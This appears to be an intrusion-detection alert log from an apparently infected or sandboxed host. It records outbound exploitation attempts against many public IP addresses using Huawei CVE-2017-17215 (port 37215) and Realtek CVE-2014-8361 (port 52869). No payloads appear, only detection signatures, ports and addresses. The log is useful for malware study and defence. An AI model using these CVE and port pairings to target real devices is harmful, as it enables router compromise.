                                      2024-07-20T23:01:02.095698+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031237215192.168.2.23157.44.1.200
                                      2024-07-20T23:01:21.233814+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5689037215192.168.2.23197.10.234.194
                                      2024-07-20T23:01:02.065712+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993637215192.168.2.2341.136.199.110
                                      2024-07-20T23:00:59.223718+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4395637215192.168.2.23197.16.71.7
                                      2024-07-20T23:01:02.108705+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3711837215192.168.2.2341.96.43.132
                                      2024-07-20T23:01:19.842102+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5797852869192.168.2.23184.112.202.180
                                      2024-07-20T23:01:22.845427+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4253052869192.168.2.2347.237.197.200
                                      2024-07-20T23:00:59.208769+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4282437215192.168.2.23139.165.159.227
                                      2024-07-20T23:01:19.811438+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4428252869192.168.2.2336.193.87.124
                                      2024-07-20T23:00:59.171003+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3453437215192.168.2.23157.86.250.128
                                      2024-07-20T23:01:18.436844+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4768437215192.168.2.2341.214.148.214
                                      2024-07-20T23:01:18.570296+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414237215192.168.2.23197.5.25.5
                                      2024-07-20T23:00:59.180699+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4315437215192.168.2.23197.252.90.201
                                      2024-07-20T23:01:21.670288+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4479237215192.168.2.23139.13.89.177
                                      2024-07-20T23:01:22.188401+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4778652869192.168.2.23115.225.187.157
                                      2024-07-20T23:00:59.180699+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255237215192.168.2.23157.113.160.230
                                      2024-07-20T23:01:24.431186+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740037215192.168.2.2341.185.218.214
                                      2024-07-20T23:01:00.651026+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3418437215192.168.2.2341.78.37.100
                                      2024-07-20T23:01:20.182814+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5062652869192.168.2.23161.203.121.55
                                      2024-07-20T23:01:21.243581+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4487052869192.168.2.23221.226.241.204
                                      2024-07-20T23:01:09.021221+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4918452869192.168.2.2344.188.193.15
                                      2024-07-20T23:01:20.137445+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773837215192.168.2.2341.233.17.165
                                      2024-07-20T23:01:21.294700+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5793037215192.168.2.23157.129.226.209
                                      2024-07-20T23:01:18.508899+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3678837215192.168.2.2369.74.218.35
                                      2024-07-20T23:01:19.578437+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4672852869192.168.2.2313.18.63.141
                                      2024-07-20T23:01:20.819226+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3356052869192.168.2.238.98.158.174
                                      2024-07-20T23:01:19.798173+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5721052869192.168.2.23135.9.168.169
                                      2024-07-20T23:01:20.860262+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5318252869192.168.2.23187.26.13.206
                                      2024-07-20T23:01:21.565676+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4102252869192.168.2.2357.224.40.86
                                      2024-07-20T23:00:59.181164+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3584037215192.168.2.2372.48.156.196
                                      2024-07-20T23:01:18.245434+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4251037215192.168.2.23173.155.49.17
                                      2024-07-20T23:01:00.523287+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4155037215192.168.2.2341.166.159.225
                                      2024-07-20T23:00:59.219743+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4898437215192.168.2.2341.231.235.189
                                      2024-07-20T23:01:21.035713+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3627852869192.168.2.23112.103.96.49
                                      2024-07-20T23:01:19.552023+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4215052869192.168.2.23161.98.32.121
                                      2024-07-20T23:01:08.864629+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4065052869192.168.2.23199.214.91.137
                                      2024-07-20T23:01:19.506605+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4526852869192.168.2.23109.80.210.12
                                      2024-07-20T23:01:00.658201+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4226037215192.168.2.2341.112.123.1
                                      2024-07-20T23:00:59.181164+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4814237215192.168.2.23197.21.129.208
                                      2024-07-20T23:00:59.201033+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3389437215192.168.2.2341.132.20.65
                                      2024-07-20T23:00:59.170219+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3326237215192.168.2.2341.232.172.92
                                      2024-07-20T23:01:18.600721+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5592837215192.168.2.2341.25.193.130
                                      2024-07-20T23:01:18.490939+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3651237215192.168.2.23157.21.67.49
                                      2024-07-20T23:01:21.283272+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4955052869192.168.2.2378.39.181.117
                                      2024-07-20T23:01:21.842450+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4932052869192.168.2.23154.97.74.140
                                      2024-07-20T23:01:20.821142+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5776452869192.168.2.23169.193.81.146
                                      2024-07-20T23:01:00.660317+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4682237215192.168.2.23157.249.16.252
                                      2024-07-20T23:01:02.066021+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3541437215192.168.2.2376.17.111.28
                                      2024-07-20T23:01:18.288852+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406437215192.168.2.23221.200.167.164
                                      2024-07-20T23:01:00.662825+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3505837215192.168.2.23105.15.118.157
                                      2024-07-20T23:01:20.997029+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4077852869192.168.2.23104.152.150.214
                                      2024-07-20T23:01:00.657714+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5694037215192.168.2.2341.144.198.102
                                      2024-07-20T23:01:21.515296+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3413652869192.168.2.2365.114.239.111
                                      2024-07-20T23:01:22.230051+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5488452869192.168.2.23105.183.167.212
                                      2024-07-20T23:01:21.297208+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5860252869192.168.2.23140.186.145.164
                                      2024-07-20T23:01:02.067656+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4278437215192.168.2.2383.22.51.58
                                      2024-07-20T23:01:05.273692+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3529652869192.168.2.23133.46.67.74
                                      2024-07-20T23:01:18.397835+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3341837215192.168.2.23197.127.202.249
                                      2024-07-20T23:01:21.452762+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5887852869192.168.2.23162.162.162.31
                                      2024-07-20T23:01:00.649623+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6067437215192.168.2.23157.114.148.67
                                      2024-07-20T23:01:19.348834+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5195452869192.168.2.23100.7.167.160
                                      2024-07-20T23:01:21.605490+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939237215192.168.2.23155.165.181.96
                                      2024-07-20T23:01:02.119631+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4916437215192.168.2.2371.240.106.220
                                      2024-07-20T23:01:00.658630+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3496237215192.168.2.23197.194.243.184
                                      2024-07-20T23:00:59.180699+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4501237215192.168.2.23157.20.27.216
                                      2024-07-20T23:01:00.662825+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058437215192.168.2.2341.215.110.81
                                      2024-07-20T23:01:21.206624+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5364052869192.168.2.2391.10.179.128
                                      2024-07-20T23:00:59.164966+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344037215192.168.2.23157.5.83.65
                                      2024-07-20T23:00:59.223718+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469437215192.168.2.2341.47.64.65
                                      2024-07-20T23:00:59.213565+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740837215192.168.2.23197.6.34.101
                                      2024-07-20T23:01:00.661486+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626037215192.168.2.23157.234.41.166
                                      2024-07-20T23:00:59.206164+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6061637215192.168.2.2343.169.90.245
                                      2024-07-20T23:00:59.171003+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5284237215192.168.2.2341.132.51.195
                                      2024-07-20T23:01:00.648489+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243437215192.168.2.23155.28.185.96
                                      2024-07-20T23:01:00.648489+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4106837215192.168.2.2341.130.229.37
                                      2024-07-20T23:01:00.658298+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4297837215192.168.2.23206.176.8.137
                                      2024-07-20T23:01:20.185305+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5594837215192.168.2.23197.57.93.26
                                      2024-07-20T23:01:21.173231+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4392852869192.168.2.23169.107.25.12
                                      2024-07-20T23:01:02.083467+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3625637215192.168.2.239.120.239.102
                                      2024-07-20T23:01:00.657714+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5430237215192.168.2.23197.133.25.253
                                      2024-07-20T23:01:14.013297+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4241437215192.168.2.23157.93.68.27
                                      2024-07-20T23:01:21.202996+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3876837215192.168.2.2364.62.112.142
                                      2024-07-20T23:01:00.652845+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3486437215192.168.2.23197.115.124.156
                                      2024-07-20T23:01:18.263044+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4109437215192.168.2.23157.66.238.102
                                      2024-07-20T23:01:19.321782+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4364452869192.168.2.23199.61.238.254
                                      2024-07-20T23:01:25.731945+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5727652869192.168.2.23111.252.253.89
                                      2024-07-20T23:01:00.648489+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911437215192.168.2.23197.196.77.201
                                      2024-07-20T23:01:20.287563+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5549852869192.168.2.23191.173.38.241
                                      2024-07-20T23:01:00.658298+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398037215192.168.2.23157.230.88.31
                                      2024-07-20T23:01:18.227280+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5905037215192.168.2.23203.201.15.112
                                      2024-07-20T23:01:21.230536+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4633852869192.168.2.23210.116.25.221
                                      2024-07-20T23:00:59.218459+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4726037215192.168.2.238.108.207.220
                                      2024-07-20T23:01:02.088869+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4285437215192.168.2.23197.235.3.106
                                      2024-07-20T23:01:18.294530+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706837215192.168.2.23197.30.15.103
                                      2024-07-20T23:01:19.592314+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4440852869192.168.2.2382.63.31.170
                                      2024-07-20T23:01:21.017864+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4337852869192.168.2.23201.173.108.254
                                      2024-07-20T23:01:22.166592+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5714252869192.168.2.2323.225.3.54
                                      2024-07-20T23:01:22.209396+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3392452869192.168.2.23168.229.219.185
                                      2024-07-20T23:01:20.354087+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5115052869192.168.2.23172.32.160.159
                                      2024-07-20T23:01:00.648916+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4739237215192.168.2.23197.151.222.142
                                      2024-07-20T23:01:00.658298+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5038437215192.168.2.2341.203.224.247
                                      2024-07-20T23:01:22.182200+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3750452869192.168.2.2344.181.179.103
                                      2024-07-20T23:01:21.011580+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4847252869192.168.2.23203.236.42.147
                                      2024-07-20T23:01:21.620060+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4358452869192.168.2.23186.40.176.32
                                      2024-07-20T23:01:02.098963+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066037215192.168.2.2341.229.154.58
                                      2024-07-20T23:01:21.782825+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3767852869192.168.2.23104.75.200.235
                                      2024-07-20T23:01:19.529672+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4133252869192.168.2.23119.187.229.164
                                      2024-07-20T23:00:59.180699+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3703837215192.168.2.23107.136.23.140
                                      2024-07-20T23:01:18.373821+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4997437215192.168.2.23197.231.189.109
                                      2024-07-20T23:01:18.397150+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223237215192.168.2.23197.155.27.254
                                      2024-07-20T23:01:18.514803+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5779637215192.168.2.23197.249.133.131
                                      2024-07-20T23:01:21.487846+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4386252869192.168.2.23209.154.77.145
                                      2024-07-20T23:01:09.021221+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5996652869192.168.2.2343.227.14.32
                                      2024-07-20T23:01:09.032669+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5431252869192.168.2.23100.7.167.160
                                      2024-07-20T23:01:18.422111+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550637215192.168.2.23157.6.221.99
                                      2024-07-20T23:00:59.171003+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5263237215192.168.2.23197.12.37.150
                                      2024-07-20T23:01:19.307476+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4246452869192.168.2.23157.202.7.129
                                      2024-07-20T23:01:19.499297+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4397852869192.168.2.23148.117.206.184
                                      2024-07-20T23:01:00.654988+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406637215192.168.2.2391.110.161.158
                                      2024-07-20T23:01:18.405069+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674637215192.168.2.2341.173.160.14
                                      2024-07-20T23:01:20.996287+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3349452869192.168.2.23196.0.98.90
                                      2024-07-20T23:01:21.279589+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4498652869192.168.2.2384.150.128.0
                                      2024-07-20T23:01:21.240867+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3601252869192.168.2.23205.187.52.139
                                      2024-07-20T23:01:21.233858+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6048852869192.168.2.2386.86.67.253
                                      2024-07-20T23:00:59.213565+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706437215192.168.2.2341.123.9.56
                                      2024-07-20T23:01:22.267601+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4254452869192.168.2.23174.56.72.194
                                      2024-07-20T23:01:19.372914+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6077252869192.168.2.23195.67.134.63
                                      2024-07-20T23:01:09.058270+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5439452869192.168.2.23186.94.179.5
                                      2024-07-20T23:01:21.841200+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291237215192.168.2.23156.90.210.240
                                      2024-07-20T23:01:20.357609+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3564652869192.168.2.2348.69.126.229
                                      2024-07-20T23:00:59.163619+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3302837215192.168.2.23197.218.184.30
                                      2024-07-20T23:01:21.268418+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5367052869192.168.2.23132.102.141.171
                                      2024-07-20T23:01:19.851927+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4726252869192.168.2.23109.23.172.87
                                      2024-07-20T23:01:21.892196+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650837215192.168.2.23113.230.74.224
                                      2024-07-20T23:00:59.201033+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3420837215192.168.2.23157.121.143.8
                                      2024-07-20T23:00:59.227554+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4308837215192.168.2.23198.69.140.160
                                      2024-07-20T23:01:21.461356+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5243252869192.168.2.23150.181.42.248
                                      2024-07-20T23:01:19.372044+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3574652869192.168.2.239.91.73.111
                                      2024-07-20T23:01:00.661808+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3653637215192.168.2.23157.118.19.128
                                      2024-07-20T23:01:18.435833+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5750237215192.168.2.23157.189.184.171
                                      2024-07-20T23:01:21.234188+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5407037215192.168.2.23197.77.47.158
                                      2024-07-20T23:01:00.652845+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709637215192.168.2.23197.124.34.30
                                      2024-07-20T23:01:18.375075+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5245037215192.168.2.2341.214.240.131
                                      2024-07-20T23:01:20.800833+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5169652869192.168.2.23143.254.34.7
                                      2024-07-20T23:00:59.203030+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412637215192.168.2.23157.77.213.179
                                      2024-07-20T23:01:21.313692+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4138652869192.168.2.2378.200.30.164
                                      2024-07-20T23:01:18.514803+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3480837215192.168.2.2341.19.255.66
                                      2024-07-20T23:01:22.185191+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5589452869192.168.2.2365.136.207.183
                                      2024-07-20T23:01:04.989471+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5980052869192.168.2.23164.251.43.137
                                      2024-07-20T23:01:19.848902+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4761452869192.168.2.2360.63.234.192
                                      2024-07-20T23:01:02.065822+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3786037215192.168.2.2341.13.208.139
                                      2024-07-20T23:01:09.002255+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5945052869192.168.2.235.1.90.206
                                      2024-07-20T23:00:59.164966+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031237215192.168.2.2341.73.125.205
                                      2024-07-20T23:00:59.227759+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4064637215192.168.2.23198.189.132.142
                                      2024-07-20T23:01:22.138831+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3854052869192.168.2.23135.110.213.163
                                      2024-07-20T23:00:59.186953+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762237215192.168.2.23196.108.213.184
                                      2024-07-20T23:01:02.083467+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450437215192.168.2.23197.147.196.56
                                      2024-07-20T23:01:21.023643+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5794652869192.168.2.23216.170.33.89
                                      2024-07-20T23:00:59.224296+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762437215192.168.2.2341.245.116.58
                                      2024-07-20T23:01:20.835540+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5266052869192.168.2.2382.99.109.50
                                      2024-07-20T23:01:00.661486+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5208637215192.168.2.23197.182.113.83
                                      2024-07-20T23:01:21.842478+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6085852869192.168.2.2386.219.42.227
                                      2024-07-20T23:01:20.821142+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5159652869192.168.2.23195.184.165.232
                                      2024-07-20T23:01:18.378526+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3288837215192.168.2.2341.210.186.227
                                      2024-07-20T23:01:23.594181+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5412452869192.168.2.23143.254.34.7
                                      2024-07-20T23:01:04.986374+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3389652869192.168.2.23219.114.72.114
